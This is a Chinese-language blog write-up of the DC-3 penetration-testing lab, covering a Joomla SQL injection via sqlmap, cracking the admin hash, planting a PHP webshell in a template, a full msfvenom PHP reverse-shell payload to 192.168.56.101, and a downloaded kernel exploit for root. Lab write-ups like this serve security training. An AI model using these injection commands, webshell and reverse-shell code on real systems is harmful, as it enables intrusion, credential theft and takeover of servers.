首页 > 其他分享 >DC-3

DC-3

时间:2024-04-16 20:23:27浏览次数:15  
标签:shell fullordering -- fields list DC php

DC-3渗透测试过程

主机发现

arp-scan -l

靶机ip192.168.56.113

image-20240416140034898

就开启了一个80端口,直接去看web页面

目录扫描

cmseek扫描到cms的名字和版本

image-20240416140246803

joomscan扫描

joomscan -u http://192.168.56.113

image-20240416195152267

漏洞发现和利用

image-20240416140405440

找到该cms的历史漏洞

它的利用方法是

Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

直接sqlmap扫就行了

爆数据库

sqlmap -u "http://192.168.56.113/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

爆表名

sqlmap -u "http://192.168.56.113/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

爆字段

sqlmap -u "http://192.168.56.113/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]

查看字段内容

sqlmap -u "http://192.168.56.113/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump -p list[fullordering]

得到用户名和密码

+--------+--------------------------------------------------------------+
| name   | password                                                     |
+--------+--------------------------------------------------------------+
| admin  | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+--------+--------------------------------------------------------------+

密码是hash,可以用john爆破试试

john pass1 --wordlist=/usr/share/wordlists/rockyou.txt

得到密码snoopy

登录web后台

首先就是尝试往文章里写php代码,结果发现是不能执行的

最终在模板这里发现可以添加文件

image-20240416141539882

我直接在index.php里直接写一句话木马

image-20240416141702059

用蚁剑进行连接,发现这里我写的木马,在/var/www/html/templates/beez3/index.php

image-20240416141929582

本来想直接用nc反弹shell,发现这个nc没有-e选项

反弹shell

那就用msf弹shell吧

msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your-IP-Address> LPORT=<Your-Port> -f raw > shell.php

利用这条命令生成一个php的稳定shell

/*<?php /**/ error_reporting(0); $ip = '192.168.56.101'; $port = 1234; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

写入1.php

用msf进行监听

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 1234
run

image-20240416144534503

输入shell即可得到一个shell

python -c 'import pty; pty.spawn("/bin/bash")'

得到一个伪终端

提权

利用辅助脚本发现提权漏洞

下载地址:https://github.com/mzet-/linux-exploit-suggester

image-20240416145927351

查看内核版本和系统版本

uname -a
lsb_release -a

Ubuntu 16.04 4.4.0

找到这个提权漏洞

image-20240416200938317

按照文档步骤即可

拷贝到tmp目录下

wget http://192.168.56.101/exploit.tar

解压

tar xf exploit.tar
./compile.sh 编译
./doubleput

即可提权成功

image-20240416201208816

总结

1.joomla这个cms的漏洞比较多,可以用专门的工具joomscan进行扫描

2.msf的反弹shell是比较稳定的shell,不能用nc或bash,可以用msf

3.因为这是老靶机,所以系统内核会漏洞,直接找别人的exp打就行了

标签:shell,fullordering,--,fields,list,DC,php
From: https://www.cnblogs.com/C0rr3ct/p/18139107

相关文章

  • STM32:HAL多通道ADC数据采集
    1、配置ADC,设置5个通道采集2、使能DMA设置为循环模式 生成工程后编写函数1、校准ADC,开启DMA接收,在main函数初始化部分调用#defineADC_MAX_NUM5#defineBTN_BUFF_LEN100staticuint16_tdma_adc_data[BTN_BUFF_LEN*ADC_MAX_NUM];1/**2*@brief校准adc,开......
  • SQL-SQL通用语法、SQL分类、DDL、DML、DQL、DCL
    一、SQL通用语法1、SQL语句可以单行或多行书写,以分号结尾。2、SQL语句可以使用空格/缩进来增强语句的可读性3、MYSQL数据库的SQL语句不区分大小写,关键字建议使用大写4、注释:单行注释:--注释内容或#注释内容(MySQL特有)多行注释:/*注释内容*/二、SQL分类分类全称说明......
  • leedcode-猜数字大小
    classSolution:defguessNumber(self,n:int)->int:i=1#初始猜测数为1flag=True#设置一个标志,用于控制循环#第一部分:使用倍增法寻找一个大于目标数字的边界值whileflag:#使用guess函数来判断......
  • leedcode-
    用二分法查找平方根:classSolution:defisPerfectSquare(self,num:int)->bool:#初始化左右边界left=1right=num#开始二分查找whileleft<=right:#计算中间值mid=left+(......
  • Adobe Acrobat Pro DC 2024 (macOS, Windows) - 创建、转换和编辑 PDF
    AdobeAcrobatProDC2024(macOS,Windows)-创建、转换和编辑PDFAdobeAcrobatPDFsoftware请访问原文链接:https://sysin.org/blog/adobe-acrobat/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgAcrobat:创建、转换和编辑PDF借助Acrobat实现各种文件创建P......
  • tailwindcss/React 性能优化
    tailwindcssvscode空格才出提示https://v2ex.com/t/1027326#reply4"editor.quickSuggestions":{"strings":true}React性能优化实用技巧在开发React应用时,性能优化是一个永恒的话题。本文将分享几个实用的工具和技巧,帮助你提升React应用的性能。ReactDeveloperToo......
  • MySQL的CDC数据实时同步
    MySQL的CDC数据实时同步 背景近段时间,业务系统架构基本完备,数据层面的建设比较薄弱,因为笔者目前工作重心在于搭建一个小型的数据平台。优先级比较高的一个任务就是需要近实时同步业务系统的数据(包括保存、更新或者软删除)到一个另一个数据源,持久化之前需要清洗数据并且构建一......
  • 攻击类型判断——玩家射击对DC131无效
    目标创建接口并编写接口逻辑(核心)启用DC131的“玩家远程攻击无效”思路使用接口代替系统自带的`ApplyDamage`节点,作为攻击传递将玩家攻击使用列举分为近战和远程两种攻击敌人在接收伤害时会判断玩家的攻击类型使DC131免疫玩家的远程攻击1.创建接口并编写接口逻辑创建......
  • leedcode-两个数组的交集
    自己写的:fromtypingimportList#导入List类型,用于函数参数和返回类型的注解classSolution:defintersection(self,nums1:List[int],nums2:List[int])->List[int]:#初始化一个空列表,用于存储两个列表的交集mylist=[]#遍历num......
  • DC/DC高压电源模块线性可调升压变换器12V24V48V转0-1000V/0-2000V/0-3000V/0-4000VDC
    特点效率高达75%以上62*45*23mm标准封装单电压输出可直接焊在PCB上工作温度:-40℃~+75℃阻燃封装,满足UL94-V0要求温度特性好电压控制输出,输出电压随控制电压线性变化应用GRB 系列模块电源是一种DC-DC升压变换器。该模块电源的输入电压分为:10~18V、18~36V及36~72......